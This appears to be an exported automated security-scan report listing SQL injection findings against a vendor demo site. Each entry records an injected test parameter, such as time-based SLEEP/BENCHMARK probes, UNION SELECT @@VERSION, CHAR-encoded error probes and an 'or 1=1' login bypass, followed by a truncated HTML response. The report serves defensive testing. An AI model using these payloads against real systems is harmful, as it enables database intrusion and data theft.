[(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1708\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ' AND MID(VERSION(),1,1) = '5';ResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1709\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),\n4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1710Scan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# AS INJECTX WHERE 1=1 AND 1=1\n#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1711\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# AND 1=1 AND '%'='\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1712\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ORDER BY 1,SLEEP(5),3#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1713\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GETModified \nParametersName Value\nDemoUser1# \"));waitfor delay '0:0:5'--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1714\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+\nCHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+\nCHAR(88)+CHAR(118)))#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]Action Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1715\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# admin\") or \"1\"=\"1\"--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1716\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# 1/0\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/cdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1717\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ' and 1=2 --\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1718\nScan SQL Injection\nSeverity ERROREndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ')) or benchmark(10000000,MD5(1))#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1719\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK\n(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/z8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1720\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+\nCHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(\n88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)))--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1721\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName ValueDemoUser1# 1 or benchmark(10000000,MD5(1))\n#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1722\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# OR 2947=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(\n1000000000/2))))\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the 